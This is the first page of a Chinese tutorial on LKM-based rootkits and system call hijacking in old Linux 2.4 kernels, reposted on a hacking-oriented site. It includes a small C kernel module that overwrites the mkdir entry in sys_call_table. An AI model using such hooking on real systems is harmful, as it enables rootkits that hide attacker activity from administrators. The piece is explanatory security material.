Linux2.4.18内核下基于LKM的系统调用劫持
日期:2007年8月29日 作者: 相关tags: Linux 内核 基于 LKM 系统 调用 劫持-
Linux现在使用是越来越多了,因此Linux的安全问题现在也慢慢为更多人所关注。Rootkit是攻击者用来隐藏踪迹和保留root访问权限的工具集,在这些工具当中,基于LKM的rootkit尤其受到关注。这些rootkit可以实现隐藏文件、隐藏进程、重定向可执行文件,给linux的安全带来很大的威胁,它们所用到的技术主要是系统调用劫持。用LKM技术截获系统调用的通常步骤如下:Office:office" />
找到需要的系统调用在sys_call_table[]中的入口(参考include/sys/syscall.h)
保存sys_call_table[x]的旧入口指针。(x代表所想要截获的系统调用的索引)
将自定义的新的函数指针存入sys_call_table[x]
在Linux2.4.18内核以前,可以将sys_call_table导出来直接使用。因此修改系统调用非常容易,下面看一个例子:
extern void* sys_call_table[];/*sys_call_table被引入,所以可以存取*/
int (*orig_mkdir)(const char *path); /*保存原始系统调用的函数指针*/
int hacked_mkdir(const char *path)
{return 0; /*一切正常,除了新建操作,该操作什么也不做*/
}
int init_module(void) /*初始化模块*/
{orig_mkdir=sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir]=hacked_mkdir;
return 0;
}
void cleanup_module(void) /*卸载模块*/
{sys_call_table[SYS_mkdir]=orig_mkdir; /*恢复mkdir系统调用到原来的那个*/
}
- [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] 下一页
-
- Linux2.4.18内核下基于LKM的系统调用劫持 相关文章:
- ·用U盘装系统的操作图解
- ·电脑高手必备 Windows系统35招实用技巧
- ·10分钟让你的XP操作系统变成正版
- ·把Win7“用户文件夹”设在非系统盘
- ·VB+Access设计图书管理系统
- ·黑客必学:DOS状态下命令方式入侵系统
- ·Win 7系统 Windows Anytime Upgrade分析
- ·电脑高手常用Windows系统技巧全接触
- Linux2.4.18内核下基于LKM的系统调用劫持 相关软件
- ·易得优全国计算机等级考试模拟系统(一级) 20081122
- ·三汇语音卡录音系统 QCR2.01.13.2
- ·东方证券金典版行情系统 V5.68
- ·海媚KTV点歌系统 V4.10 家用免费版
- ·珊瑚软件全国计算机等级考试二级VB上机考试系统 V7.0 标准版
- ·自已动手写操作系统
- ·恒智天成广西建筑工程施工质量验收系统 2009
- ·河南省2010驾校理论模拟考试系统 2.0
- 特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作
- 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转
- 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源:http://www.hackhome.com
上一篇:Python是垃圾?
下一篇:sas应用程序外部执行配置
软件相关tags: Linux 内核 基于 LKM 系统 调用 劫持